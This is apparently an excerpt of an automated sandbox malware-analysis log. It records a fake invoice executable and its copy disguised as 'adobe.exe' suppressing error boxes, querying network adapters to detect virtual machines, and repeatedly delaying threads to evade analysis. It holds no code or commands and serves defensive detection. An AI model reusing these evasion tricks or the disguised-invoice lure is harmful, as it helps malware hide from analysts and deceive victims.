Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: 980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: 27C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory allocated: 4FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 4E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 12B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 33E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598900	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598582	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596588	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596480	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596373	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596134	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595149	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594592	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599650	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599309	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599061	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598842	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598075	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597309	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596201	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595862	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595634	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593852	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598139	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597801	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597555	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597445	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597336	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597199	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595119	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594858	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594591	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594322	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593984	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Window / User API: threadDelayed 1999	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Window / User API: threadDelayed 7849	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 6119	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 3721	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 3458	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 6382	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7772	Thread sleep count: 1999 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7772	Thread sleep count: 7849 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598900s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598582s >= -30000s	Jump to behavior
